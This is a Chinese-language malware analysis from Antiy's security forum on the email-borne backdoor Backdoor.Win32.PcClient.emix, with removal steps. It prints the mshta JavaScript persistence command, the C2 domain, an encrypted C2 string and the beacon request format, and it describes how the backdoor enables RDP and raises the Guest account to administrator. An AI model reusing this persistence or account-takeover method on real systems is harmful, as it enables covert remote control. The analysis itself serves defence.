创意安天

 找回密码
 注册创意安天

Backdoor.Win32.PcClient.emix分析

[复制链接]
发表于 2011-3-21 11:27 | 显示全部楼层 |阅读模式
一、 病毒标签:
病毒名称: Backdoor.Win32.PcClient.emix
病毒类型: 后门
文件 MD5: B9CD87FE5C1D6098D169DE5C952DEDF9
公开范围: 完全公开
危害等级: 3
文件长度: 44,735 字节
感染系统: Windows 98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: PECompact 2.x -> Jeremy Collake

二、 病毒描述:
    该病毒是一个后门程序,通过招聘邮件附件的方式进行传播。附件程序通过自解压文件格式将自己伪装成图片管理软件ACDSee,压缩的文件包括伪装的后门程序和一张图片,运行自解压程序后利用自解压特性自动加载后门程序。将系统信息发送到指定地址,尝试开启3389远程桌面服务,来达到远程控制的目的。利用图片用来欺骗用户。安天实验室反病毒专家提醒广大用户,不要随便打开陌生邮件的附件。

三、 行为分析:
本地行为:
1、附件运行后,进行自解压,提示“Need to uncompress after see photos!”选择安装目录,会在用户选择的安装目录下释放图片文件DSG001.jpg和病毒文件DSG002.exe(PECompact壳),然后运行DSG002.exe。下面的注释包含自解压脚本命令
Setup=DSG002.exe
Title=Need compressed
Text
{
Need to uncompress after see photos!
}
DSG002.exe分析,运行后获取用户临时文件夹%temp%,然后创建一个临时文件aa.tmp(aa随机,取决于系统环境),查找资源类型为RES_FILE,资源名为101的资源,并将解密的数据写入aa.tmp文件,因为PECompact对资源进行了加密。获取用户目录下的Application Data目录,尝试删除该目录下的8..tmp.exe程序,将DSG002.exe移动到Application Data目录并命名为8.tmp.exe。获取系统目录下的mshta.exe路径。获取用户启动目录,在该目录下生成“网络连接.lnk”的快捷方式,并写入以下内容,达到开机启动的目的。
C:\WINDOWS\system32\mshta.exe "javascript:eval('new ActiveXObject(\'Wscript.shell\').Run(\'C:\x2fDOCUME~1\x2fusername\x2fAPPLIC~1\x2f8.tmp.exe\');window.close();')"
连接www.myfocusblog.info地址,以Get方式提交计算机名进行统计。c执行一个新的进程利用rundll32.exe程序加载释放的aa.tmp(dll)文件,并调用DllStart函数。开启进程,利用CMD删除病毒程序,终止病毒进程。
aa.tmp分析,从文件尾部获取加密的链接地址1@@@@@+uYF/ADy8AH7/AS99v0F/Kmnr6+vnw==,解密后为www.myfocusblog.info:8000,连接该地址获取登陆信息,打开3389远程连接服务,激活guest账户,设置密码++++++,并将Guest账户添加到管理员组。
2、文件运行后会释放以下文件
用户选择的安装目录\DSG001.jpg
用户目录\Application Data\8.tmp.exe
%temp%\aa.tmp
%启动%\网络连接.lnk
3、添加注册表启动项
无注册表修改
网络行为:
协议:HTTP
端口:80
连接域名:www.myfocus****.info
描述:通过GET方式进行统计,格式如下:
GET /count/count.asp?info=ANTIY-6C9E85756

协议:TCP
端口:8000
连接域名:www.myfocus****.info
获取登陆信息。

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
        %Windir%              WINDODWS所在目录
    %DriveLetter%            逻辑驱动器根目录
    %ProgramFiles%           系统程序默认安装目录
    %HomeDrive%           当前启动的系统的所在分区
    %Documents and Settings%       当前用户文档根目录
    %Temp%             \Documents and Settings
                      \当前用户\Local Settings\Temp
    %System32%            系统的 System32文件夹
    
    Windows2000/NT中默认的安装路径是C:\Winnt\System32
    windows95/98/me中默认的安装路径是%WINDOWS%\System
    windowsXP中默认的安装路径是%system32%   


四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载:http://www.antiy.com
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
1) 使用ATOOL管理工具,“进程管理“结束进程名为rundll32.exe包括aa.tmp模块的进程。
2) 强行删除病毒文件
删除%temp%目录下的aa.tmp临时文件(大小82,944 字节)。
删除用户目录\Application Data\8.tmp.exe。
删除%启动%\网络连接.lnk。
3) 如果不需要Guest账号,请关闭。如果需要,请修改密码。
您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

小黑屋|手机版|Archiver|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-2-21 15:08

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表